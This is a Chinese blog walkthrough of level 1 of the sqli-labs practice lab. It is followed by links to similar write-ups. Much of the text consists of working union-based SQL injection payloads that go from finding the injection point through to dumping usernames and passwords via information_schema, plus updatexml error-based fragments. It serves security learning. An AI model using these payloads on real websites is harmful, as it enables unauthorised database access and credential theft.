sqli-labs第一关

最新推荐文章于 2024-05-13 05:33:17 发布
最新推荐文章于 2024-05-13 05:33:17 发布
阅读量426 收藏 4
点赞数 4
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70613012/article/details/135903062
版权
本文详细描述了如何通过SQL注入检测方法,包括判断注入类型、猜测查询语句字段数、定位回显位置,以及获取数据库名称、表名、字段名和数据,展示了黑客可能利用的几种技术手段。
摘要由CSDN通过智能技术生成
1.判断是否存在注入,注入是字符型还是数字型?
?id=1 and 1=1

?id=1 and 1=2

因为输入and 1=1与and 1=2 回显正常,所以该地方不是数字型。

?id=1'

?id=1'--+

输入单引号后报错,在单引号后添加--+恢复正常,说明存在字符注入

2.猜解SQL查询语句中的字段数
?id=1' order by 3 --+

?id=1' order by 4 --+

利用二分法尝试,得到列数为3

3.确定回显位置

将id=1改为一个数据库不存在的id值,如-1,使用union select 1,2,3联合查询语句查看页面是否有显示位。(当union前面语句查询不到时,会使用union后面的查询语句)

?id=-1' union select 1,2,3 --+

发现页面先输出了2和3,说明页面有2个显示位 。

4.获取当前数据库
?id=1' union select 1,database(),version() --+

通过数据库自带函数database()和version()获取数据库名和版本

5.获取数据库中的表
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where  table_schema='security' --+

information_schema.tables系统表中检索所有属于security数据库的表名,并将它们连接成一个由逗号分隔的字符串。GROUP_CONCAT函数在这里用于将多个表名合并成一个单一的字符串结果。(因为查询出来是按列来排序所以需要GROUP_CONCAT函数来将列合并成一行)

6.获取表中的字段名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where  table_schema='security' and table_name='users' --+

information_schema.columns系统表中检索特定数据库(security)中特定表(users)的所有列名

7.得到数据
?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+

0x3a时表示十六进制中的冒号,方便查看信息

瓜子壳、
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第1-10关
永远相信美好的事情即将发生
02-03 906
Less-1 进入Less-1关卡,提示输入id为一个数值 尝试提交id=1,回显login name 和password 尝试提交id=1’,回显报错,说明存在注入点,根据回显内容’1’’ LIMIT 0,1(外面一层单引号表示引用,把它去掉),可判断提交的数据类型为字符型,由此可猜测sql语句:select * from 某表 where id='某个值' limit 0,1 接下来利用order by判断表中有几列,提交?id=1' order by 3 --+回显正常,提交?id=1' ord
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs 1-10(GET型注入)新手通关详解(高手误入)_sqllabs前十关
2401_84253132的博客
05-13 655
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
sqli-labs一第一关详细步骤,新手打基础篇
qq_50956249的博客
03-21 578
5、查出数据库名称后,爆破表名,union 1,group_concat(table_name),3,…union 1,2,group_concat(column_name),…7、查出了具体的字段名,最后一步就是查出具体的数据了,union 1,2,group _concat(username,id,password) from users–+4、先查出使用的是哪个数据库,用database()函数,以及数据库版本信息,用version()函数。输入1’–+,有用户显示。输入 1,有用户显示。
Sqli-Labs~1 详解
Cy610610的博客
12-04 1245
sqli-labs第一关,手把手教学,包学包会!内含informations_schema数据库解释说明等相关内容
sqli-labs靶场练习笔记
11-09
- 示例:判断数据库名称的第一个ASCII码值是否小于等于100。 - **第4关:单引号注入** - **特点**:当尝试使用双引号时,页面出现错误提示或异常行为。 - **测试方法**:通过构造包含单引号的SQL语句来测试是否...
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名...
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
#### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问地址:`http://sql-lasb-master:8088/Less-1/` - 注入尝试:`...
详细sqli-labs(1-20)通关讲解
最新发布
05-18
#### 第一关:判断是否存在 SQL 注入 本关目的是为了帮助用户了解如何判断一个网站是否存在 SQL 注入漏洞,并通过不同的输入来观察反馈信息的变化,以此来确认是否存在漏洞。 **实验步骤** 1. **初步判断**: - ...
sqli-labs闯关小游戏21-65.docx
10-23
sqli-labs是一个专门用于学习和练习SQL注入技巧的平台,其关卡设计由易到难,帮助用户深入理解这种攻击方式。 在第21关中,我们可以看到利用了`UNION SELECT`语法,这是SQL注入的经典手法,通过将恶意SQL插入到合法...
Sqli-labs通关全解---关于Sqli-lab--1
cyynid的博客
01-10 526
靶场搭建
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs 1-10(GET型注入)新手通关详解(高手误入)
b1n的博客
07-16 2963
1.第一关是单引号字符型注入2.用--+进行注释,页面正常显示。
sqli-labs靶场1-5关
2302_80044238的博客
01-27 1953
输入:(解析:updatexml()是一个用于修改XML数据的SQL函数 1 是XML中的路径,concat()用于将0x7e和selectdatabase()函数拼接起来,0x7e是十六进制表示~特殊符号会导致查询出错从而爆出数据 (0x7e也可使用其他符号代替但是需要加上单引号))当我们尝试不闭合还有单引号闭合两种方法时发现页面反馈给我们的时sql语法不正确也就是我们所注入的sql攻击语句是无法执行的,此时我们可以去看看此网页的源代码(可以直接在小皮的根目录里面找对应的关卡就可以找到)
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1374
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-labs通关详解(1-20关)
2302_81105681的博客
04-11 3095
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6关,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显数据库名。
sqli-labs靶场1-5题解答】
AuroraMiraitowa的博客
01-30 1654
本来语句是一个完整的语句,它是用单引号闭合的,然后我们输入的单引号参数,导致多出了一个单引号而让语句闭合不了,产生报错,所以我们可以判断是单引号闭合。这样我们就看到了2,3这两个回显位然后我们就利用union查询,查看数据库的版本和数据库名,输入?id=1’and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)–+id=-1’union select 1,2,3–+(将id弄成一个负数的值,使前面的语句失效)然后看看union查询是否有回显位。
sql注入靶场sqli-labs(1-4)
qq_64153534的博客
02-28 284
打开第一关提示输入数字作为参数输入回显用户名与密码信息输入试探可以使用')")这几个常用闭合方式来判断,报错信息回显,根据信息判断注入点就是?id=1'我们输入的1'被两个单引号包裹着,可判断出语句是单引号闭合,注入点就是一个单引号我们使用判断表的字段数,从1开始到4的时候报错,可知字段数为3,后面使用联合注入要知道字段数,这里的作用是将后面的内容都注释掉,使后面的语句不影响我们插入的sql语句
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值